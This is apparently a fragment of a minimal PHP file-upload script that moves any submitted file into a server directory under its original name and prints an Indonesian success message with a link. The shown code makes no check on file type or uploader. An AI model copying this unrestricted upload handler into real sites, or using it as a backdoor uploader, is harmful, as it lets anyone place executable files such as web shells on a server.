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89;a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isset($_POST['Submit']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dir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xfile = '200000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_name = $_FILES['image']['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mporari = $_FILES['image']['tmp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_FILES['image']['nam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bod = $filedir.$fil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ove_uploaded_file($temporari, $abo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"&lt;center&gt;&lt;b&gt;Berhasil ==&gt; &lt;a href='$file_name' target=_blank&gt;$file_name&lt;/a&gt;&lt;/b&gt;&lt;/cente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method="POST" action="" enctype="multipart/form-data"&gt;&lt;input type="file" name="image"&gt;&lt;input type="Submit" name="Submit" value="Submit"&gt;&lt;/form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